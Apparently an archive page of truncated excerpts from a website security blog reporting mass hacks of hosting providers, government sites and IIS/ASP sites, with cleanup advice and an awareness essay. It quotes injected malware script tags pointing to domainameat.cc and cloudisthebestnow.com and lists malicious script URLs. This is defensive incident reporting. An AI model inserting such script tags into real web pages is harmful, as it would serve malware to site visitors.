Bluehost Talks Down Malware Percentages – Offers Sucuri a Forum Ban

On Sunday we reported that a number of sites hosted by Bluehost had been hacked (including their CEO’s blog).

On Monday while browsing through some of their forums, we noticed a thread regarding the exploit with remarks from forum moderators and administrators to curious customers that didn’t quite make sense.

#1 from one moderator:

Since such a negligible percentage of Bluehost sites were hacked it is just about guaranteed that it is an individual script issue rather than anything more widespread.

If it were something other than individual scripts being vulnerable then a lot more than 0.00006% of accounts would be affected.

It would be interesting to learn what Bluehost considers a negligible percentage for something like this. We’re also curious to learn more about how the .00006 percentage was determined. More on the numbers we calculated is included below.


Bluehost CEO blog & others exploited by domainameat.cc

We’re seeing that a good number of sites hosted at Bluehost have been hacked and infected with malware from domainameat.cc. The blog of Matt Heaton, CEO of Bluehost was also exploited (mattheaton.com).

After analyzing some of these sites, they were all hacked around 9/10am this morning. This is the malware script showing up at the bottom of the sites:

<script src="http://domainameat.cc/js2.php"></script>

This is the report from our scanner against their CEO’s blog:


Brazilian Government Websites Hacked with Spam

In the last few months we’ve been tracking a common technique being used by attackers: They hack a web site and use that as part of their link farm to build page rank for them on search engines. We posted many articles about similar spam issues in the past.

Recently, we’ve started to notice a lot of government web sites from Brazil in this list.

Some are fairly big sites:

http://www.ibama.gov.br – Environmental Ministry
http://www4.planalto.gov.br – Old Presidential Web site
http://www.inmetro.gov.br – Quality control ministry
http://www.cnen.gov.br – Nuclear Energy Commission
http://www.fazenda.sp.gov.br – Treasury from the state of Sao Paulo
http://inpa.gov.br – Amazon research institute
http://www.jfal.gov.br/ – Alagoas Federal Justice

http://inep.gov.br
http://ww.fundacentro.gov.br
http://www.eletrosul.gov.br
http://www.amprev.ap.gov.br
http//www.cvs.saude.sp.gov.br/
http://www.faetec.rj.gov.br
http://www.comprasnet.ba.gov.br
http://www.al.rs.gov.br
http://cmnovasoure.ba.gov.br



Web sites hacked with malware from iopap.upperdarby26.com

Today we are seeing a good number of sites hacked with malware from http://iopap.upperdarby26.com. The malicious JavaScript is added to the bottom of every index.php file and to the bottom of a few JavaScript files as well.

The malware is getting loaded from a few different files, all with the same content:

http://iopap.upperdarby26.com/FIFO.js
http://iopap.upperdarby26.com/Web_Ring.js
http://iopap.upperdarby26.com/Real-Time.js
http://iopap.upperdarby26.com/Applet1.html
..
http://iopap.upperdarby26.com/Infotainment.js



Cleaning SPAM from your WordPress blog.

A common trend lately is SPAM getting added to WordPress blogs. Attackers are using this to increase their page rank on search engines like Google, Yahoo, etc.

So, if you search for your site on Google do you see a bunch of “viagra” content instead of the original title? If you click on any link from Google are you redirected to a different page? In this article we will help you understand the techniques being used by the attackers and how to clean your blog.

Getting started

The first thing you have to do is determine whether your site has been hacked. Our scanner should be able to tell you that, and a Google search using your site name plus a few common spam keywords will help you identify it too. Also, if you are our client, we can get your site fixed for you, so stop reading this and send us an email.


The Mission of Security Awareness

This article was written by Christopher Vera, CISSP, HISP, GCFA, GLEG for Sucuri.


Of all the elements of a successful cyber security program, security awareness is probably one of the least understood. Some cyber security professionals have even gone as far as to claim that security awareness doesn’t work. Their observations are not entirely unfounded. The key is that successful awareness programs must provide value to their audiences. When they don’t provide value they are ignored, and thus ineffective, plain and simple. Further, a security awareness program cannot protect a user from everything. With new platform-agnostic attacks bypassing even fully patched systems with host-based firewalls and the most recent anti-virus signatures, it’s easy to throw one’s arms up in frustration. But defense in depth is one of our most trusted principles. We understand that no one security control can protect us from every threat. Otherwise, we’d have tossed out our network firewalls years ago. The advantage of a successful security awareness program is that it’s much less expensive to implement and maintain.


Attack of WordPress blogs on Rackspace

Update: It is not a “mass” attack as we described. Sorry about that. A good number of sites were affected (we don’t have a clear number yet), but nothing massive or crazy as our post sounded.

If you follow our blog, you probably noticed that these last few months have been especially hard for hosting companies. Lots of them got hacked, bringing down thousands of sites with them. Now we are hearing reports of a mass hack of WordPress blogs hosted on Rackspace.

What is going on?

The attackers were able to get access to Rackspace databases and infect the sites through there. They created a new admin user on many WordPress sites, giving them full access to the WordPress admin panel.

With that access they were able to inject malware, and as we saw before they used that to inject SEO spam into the sites.

What are the symptoms?

The first symptom that is easy to spot is new and malicious JavaScript files or spam on your site. Our scanner would detect them properly:


Mass infection of IIS/ASP sites – 2677.in/yahoo.js

A large number of sites have been hacked again in the last few hours with a malware script pointing to http://2677.in/yahoo.js. Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

http://www.ameristar.com/
http://www.servicewomen.org
http://www.chicagopublicradio.org
http://www.industryweek.com
http://www.booksellerandpublisher.com.au
http://www.spain-holiday.com

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:


GoDaddy sites hacked with cloudisthebestnow

If you thought your problems at GoDaddy were over, well, not yet.

We’ve confirmed that today at around 3pm EST, GoDaddy servers were hacked again. Malware pointing to cloudisthebestnow.com/kp.php was inserted on thousands of sites hosted by the provider.

This is what the script will look like in your pages:

<script src=http://cloudisthebestnow.com/kp.php>

It will redirect your users to that nasty “fake AV” page again. What’s interesting is that cloudisthebestnow.com is hosted and owned by the same people involved in the latest attacks at GoDaddy.


Mass infection of IIS/ASP sites – robint.us

An incredibly large number of sites have been hacked in the last day with a malware script pointing to http://ww.robint.us/u.js. Not only small sites, but some big ones got hit as well:

http://www.intljobs.org (still hacked)
http://www.servicewomen.org (still hacked)
http://online.wsj.com (partially fixed)

http://www.asbmb.org
http://www.lotl.com
http://acsi.org/
http://www.cinemathequeontario.ca
http://www.plazakvinna.com
http://www.delawareriverkeeper.org/
http://www.traveldaily.co.uk
http://www.thepaddockarea.com
http://www.ex-designz.net
http://www.historyasia.com/
http://www.montrealmetropolis.ca
http://www.charlottelive.org
http://www.cebes.org.br

How many sites got infected? According to Google, over 114.000 different pages have been infected. Wow!
